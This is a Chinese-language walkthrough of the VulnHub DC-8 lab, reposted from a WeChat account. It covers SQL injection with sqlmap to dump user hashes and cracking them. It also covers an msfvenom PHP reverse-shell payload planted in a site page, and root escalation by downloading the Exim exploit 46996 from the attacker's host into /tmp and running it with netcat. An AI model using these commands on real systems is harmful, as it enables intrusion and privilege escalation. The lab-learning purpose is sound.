欢迎回来
靶机官网大致说明如下
DC-8是另一个专门构建的易受攻击的实验室,目的是在渗透测试领域积累经验。这个挑战有点复杂,既是实际挑战,又是关于在Linux上安装和配置的两因素身份验证是否可以阻止Linux服务器被利用的“概念证明”。由于在Twitter上询问了有关双重身份验证和Linux的问题,也由于@ theart42的建议,最终导致了该挑战的“概念验证”部分。这项挑战的最终目标是绕过两因素身份验证,获得root权限并读取唯一的标志。必须具备Linux技能并熟悉Linux命令行,以及一些基本渗透测试工具的经验。
靶机下载地址
http : //www.five86.com/downloads/DC-8.zip扫描主机,发现开放端口22和80
开放80端口,进行路径扫描
dirb http://192.168.0.103使用浏览器访问,页面内容不多,看到这种URL尝试看看有没有注入
可能存在注入
使用Sqlmap进行探测
sqlmap -u "http://192.168.0.103/?nid=1" -D d7db -T users -C "name,pass" --dump
尝试破解HASH,可以使用john,hashcat或者在线解密网站
cat passjohn pass
无法破解admin账户密码,破解出了普通用户john的密码
通过刚才探测出来的账号密码登录
翻阅几个可以点击的页面,看到可以编辑页面
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4444 -f raw
复制生成的Payload到页面中
访问页面,提交信息
设置监听
监听器收到会话
查看用户ID
使用python获取bash shell
shellpython -c 'import pty;pty.spawn("/bin/sh")'
翻阅目录
没有权限访问root目录,查看具有SUID权限的命令
find / -perm -u=s -type f 2> /dev/null
看到了exim4,接下来查看版本信息
exim4 --version
根据版本找exp
searchsploit Exim
找到一个shell脚本和一个metasploit模块
尝试使用shell脚本,首先查看用法,发现需要加个参数-m setuid 或者是-m netcat运行该脚本
将Exp下载到本地,由于权限不足,切换路径到tmp使用wget获取
cd /tmpwget http://192.168.0.104/46996.sh
编辑该文件的权限
chmod +x 46996.sh
运行该文件
./46996.sh -m netcat
可能是文件编码不对,查看如何修改
首先要确保文件有可执行权限 #sh>chmod a+x filename
然后修改文件格式 #sh>vi filename
利用如下命令查看文件格式 :set ff 或 :set fileformat 可以看到如下信息 fileformat=dos 或 fileformat=unix
利用如下命令修改文件格式 :set ff=unix 或 :set fileformat=unix
:wq (存盘退出)
修改过后还是不管用,还是显示一样的错误信息,经过搜索发现有个答案是
这个脚本是在windows下开发 ,直接运行会报错(bash: ./46996.sh: /bin/bash^M: bad interpreter: No such file or directory)用这个busybox dos2unix 46996.sh命令就好了
还是不管用,干脆直接去去exploit-db上直接找这个脚本,拿到Linux环境下面编辑就好了,这样就不会出现格式问题
https://www.exploit-db.com/exploits/46996使用记事本编辑成sh脚本,下载到靶机上准备提权
wget 192.168.0.104/hack.shchmod 777 hack.sh./hack.sh -m netcat
攻击机设置监听
拿到root路径下的flag
大功告成
感谢关注
原文始发于微信公众号(Kali渗透测试教程):【VulnHub-DC8】Exim4提权之坎坷的拿到Flag
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论